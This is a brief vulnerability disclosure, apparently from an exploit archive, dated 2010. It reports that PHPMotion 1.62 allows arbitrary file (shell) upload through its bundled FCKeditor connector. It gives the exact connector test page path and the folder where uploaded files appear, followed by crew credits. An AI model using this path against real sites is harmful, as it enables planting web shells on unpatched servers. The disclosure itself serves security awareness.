PHPMotion suffers from a FCKeditor related shell upload vulnerability.
b91cb4287ff25950565e4177b3873042319271edb62941f3c2267b38c7d92374-----------------------------------------------------------------------
phpmotion/FCKeditor File upload vulnerabilities
-----------------------------------------------------------------------
Author : trycyber (trycyber@magelangcyber.com)
Homepage : https://indonesiancoder.com,magelangcyber.web.id
Vendor : https://www.phpmotion.com/
Dork : CIHUY ;p
Version : 1.62
Tested on : Win Xp sp2
Date : November 23, 2010
-----------------------------------------------------------------------
I. POC & Exploit
-----------------------------------------------------------------------
Default : https://127.0.0.1/
exploit : https://127.0.0.1/phpmotion/fckeditor/editor/filemanager/connectors/test.html
results in : https://127.0.0.1/userfiles/name of file
------------------------------------------------------------------------
Credits
------------------------------------------------------------------------
Allahu Akbar
INDONESIAN CODER ~ Magelangcyber-team ~ Kill-9 Crew ~ MC Crew
Don Tukulesto ~ kaMtiEz ~ ibl13z ~ Jundab ~ N4ck0 ~ Yurakha ~ aN93l1c ~ Mboys ~ Contrex ~ n4KuLa_
k4L0ng666 ~ Xr0b0t ~ Adipati ~ Arianom ~ t3ll0 ~ cimpli ~ Pathloader
-------------------------------------------------------------------------
"aku belajar bukan karenamu, melainkan aku ingin aku menjadi aku"
Indonesiancoder family & Magelangcyber family
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed